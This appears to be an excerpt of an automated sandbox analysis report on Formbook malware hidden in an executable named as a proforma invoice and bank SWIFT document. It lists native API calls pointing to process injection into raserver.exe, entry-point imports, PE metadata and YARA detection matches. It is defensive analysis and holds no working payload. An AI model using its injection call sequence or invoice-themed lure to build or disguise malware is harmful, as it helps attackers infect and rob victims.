Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29710 NtQueryInformationToken,LdrInitializeThunk,	2_2_00B29710
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B298A0 NtWriteVirtualMemory,	2_2_00B298A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29820 NtEnumerateKey,	2_2_00B29820
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2B040 NtSuspendThread,	2_2_00B2B040
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B299D0 NtCreateProcessEx,	2_2_00B299D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29950 NtQueueApcThread,	2_2_00B29950
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29A80 NtOpenDirectoryObject,	2_2_00B29A80
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29A10 NtQuerySection,	2_2_00B29A10
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2A3B0 NtGetContextThread,	2_2_00B2A3B0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29B00 NtSetValueKey,	2_2_00B29B00
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B295F0 NtQueryInformationFile,	2_2_00B295F0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2AD30 NtSetContextThread,	2_2_00B2AD30
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29520 NtWaitForSingleObject,	2_2_00B29520
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29560 NtWriteFile,	2_2_00B29560
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B296D0 NtCreateKey,	2_2_00B296D0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29610 NtEnumerateValueKey,	2_2_00B29610
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29670 NtQueryInformationProcess,	2_2_00B29670
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29650 NtQueryValueKey,	2_2_00B29650
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29730 NtQueryVirtualMemory,	2_2_00B29730
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2A710 NtOpenProcessToken,	2_2_00B2A710
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29770 NtSetInformationFile,	2_2_00B29770
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B2A770 NtOpenThread,	2_2_00B2A770
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B29760 NtOpenProcess,	2_2_00B29760
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_1_004181C0 NtCreateFile,	2_1_004181C0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_1_00418270 NtReadFile,	2_1_00418270
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_1_004182F0 NtClose,	2_1_004182F0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_1_004183A0 NtAllocateVirtualMemory,	2_1_004183A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF95D0 NtClose,LdrInitializeThunk,	7_2_04CF95D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9540 NtReadFile,LdrInitializeThunk,	7_2_04CF9540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF96D0 NtCreateKey,LdrInitializeThunk,	7_2_04CF96D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04CF96E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9650 NtQueryValueKey,LdrInitializeThunk,	7_2_04CF9650
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04CF9660
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_04CF9FE0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_04CF9780
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_04CF9710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9840 NtDelayExecution,LdrInitializeThunk,	7_2_04CF9840
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04CF9860
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF99A0 NtCreateSection,LdrInitializeThunk,	7_2_04CF99A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_04CF9910
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9A50 NtCreateFile,LdrInitializeThunk,	7_2_04CF9A50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF95F0 NtQueryInformationFile,	7_2_04CF95F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9560 NtWriteFile,	7_2_04CF9560
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9520 NtWaitForSingleObject,	7_2_04CF9520
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CFAD30 NtSetContextThread,	7_2_04CFAD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9670 NtQueryInformationProcess,	7_2_04CF9670
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9610 NtEnumerateValueKey,	7_2_04CF9610
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF97A0 NtUnmapViewOfSection,	7_2_04CF97A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9760 NtOpenProcess,	7_2_04CF9760
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CFA770 NtOpenThread,	7_2_04CFA770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9770 NtSetInformationFile,	7_2_04CF9770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CFA710 NtOpenProcessToken,	7_2_04CFA710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9730 NtQueryVirtualMemory,	7_2_04CF9730
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF98F0 NtReadVirtualMemory,	7_2_04CF98F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF98A0 NtWriteVirtualMemory,	7_2_04CF98A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CFB040 NtSuspendThread,	7_2_04CFB040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9820 NtEnumerateKey,	7_2_04CF9820
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF99D0 NtCreateProcessEx,	7_2_04CF99D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9950 NtQueueApcThread,	7_2_04CF9950
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9A80 NtOpenDirectoryObject,	7_2_04CF9A80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9A00 NtProtectVirtualMemory,	7_2_04CF9A00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9A10 NtQuerySection,	7_2_04CF9A10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9A20 NtResumeThread,	7_2_04CF9A20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CFA3B0 NtGetContextThread,	7_2_04CFA3B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CF9B00 NtSetValueKey,	7_2_04CF9B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC81C0 NtCreateFile,	7_2_00AC81C0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC82F0 NtClose,	7_2_00AC82F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC8270 NtReadFile,	7_2_00AC8270
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC83A0 NtAllocateVirtualMemory,	7_2_00AC83A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC81BC NtCreateFile,	7_2_00AC81BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC82EB NtClose,	7_2_00AC82EB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AC839B NtAllocateVirtualMemory,	7_2_00AC839B

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040323C

Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_00404853	0_2_00404853
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_00406131	0_2_00406131
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 0_2_6F731A98	0_2_6F731A98
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041D042	2_2_0041D042
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041CB69	2_2_0041CB69
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00408C5B	2_2_00408C5B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_0041CF4E	2_2_0041CF4E
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B120A0	2_2_00B120A0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB20A8	2_2_00BB20A8
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFB090	2_2_00AFB090
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB28EC	2_2_00BB28EC
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A830	2_2_00B0A830
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BBE824	2_2_00BBE824
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA1002	2_2_00BA1002
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B099BF	2_2_00B099BF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B04120	2_2_00B04120
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AEF900	2_2_00AEF900
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB22AE	2_2_00BB22AE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4AEF	2_2_00BA4AEF
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B9FA2B	2_2_00B9FA2B
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1EBB0	2_2_00B1EBB0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B923E3	2_2_00B923E3
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA03DA	2_2_00BA03DA
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BADBD2	2_2_00BADBD2
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B1ABD8	2_2_00B1ABD8
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB2B28	2_2_00BB2B28
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0A309	2_2_00B0A309
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0AB40	2_2_00B0AB40
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B8CB4F	2_2_00B8CB4F
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA4496	2_2_00BA4496
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AF841F	2_2_00AF841F
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B0B477	2_2_00B0B477
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAD466	2_2_00BAD466
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B12581	2_2_00B12581
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BA2D82	2_2_00BA2D82
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AFD5E0	2_2_00AFD5E0
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB25DD	2_2_00BB25DD
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00AE0D20	2_2_00AE0D20
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB2D07	2_2_00BB2D07
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB1D55	2_2_00BB1D55
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB2EF7	2_2_00BB2EF7
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00B06E30	2_2_00B06E30
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BAD616	2_2_00BAD616
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BB1FF1	2_2_00BB1FF1
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_2_00BBDFCE	2_2_00BBDFCE
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: 2_1_0041D042	2_1_0041D042
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74496	7_2_04D74496
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7D466	7_2_04D7D466
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CC841F	7_2_04CC841F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D825DD	7_2_04D825DD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CCD5E0	7_2_04CCD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE2581	7_2_04CE2581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D72D82	7_2_04D72D82
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D81D55	7_2_04D81D55
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D82D07	7_2_04D82D07
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CB0D20	7_2_04CB0D20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D82EF7	7_2_04D82EF7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7D616	7_2_04D7D616
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CD6E30	7_2_04CD6E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D8DFCE	7_2_04D8DFCE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D81FF1	7_2_04D81FF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D828EC	7_2_04D828EC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CCB090	7_2_04CCB090
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CE20A0	7_2_04CE20A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D820A8	7_2_04D820A8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D71002	7_2_04D71002
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D8E824	7_2_04D8E824
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CDA830	7_2_04CDA830
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CD99BF	7_2_04CD99BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CBF900	7_2_04CBF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CD4120	7_2_04CD4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D74AEF	7_2_04D74AEF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D822AE	7_2_04D822AE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D6FA2B	7_2_04D6FA2B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D7DBD2	7_2_04D7DBD2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D703DA	7_2_04D703DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEABD8	7_2_04CEABD8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D623E3	7_2_04D623E3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CEEBB0	7_2_04CEEBB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CDAB40	7_2_04CDAB40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04CDA309	7_2_04CDA309
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_04D82B28	7_2_04D82B28
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACD042	7_2_00ACD042
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACCB69	7_2_00ACCB69
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB8C60	7_2_00AB8C60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB8C5B	7_2_00AB8C5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB2D87	7_2_00AB2D87
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB2D90	7_2_00AB2D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00AB2FB0	7_2_00AB2FB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00ACCF4E	7_2_00ACCF4E

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 04CBB150 appears 133 times
Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe	Code function: String function: 00AEB150 appears 136 times

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.647610440.0000000009C3F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704494044.0000000000959000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameraserver.exej% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
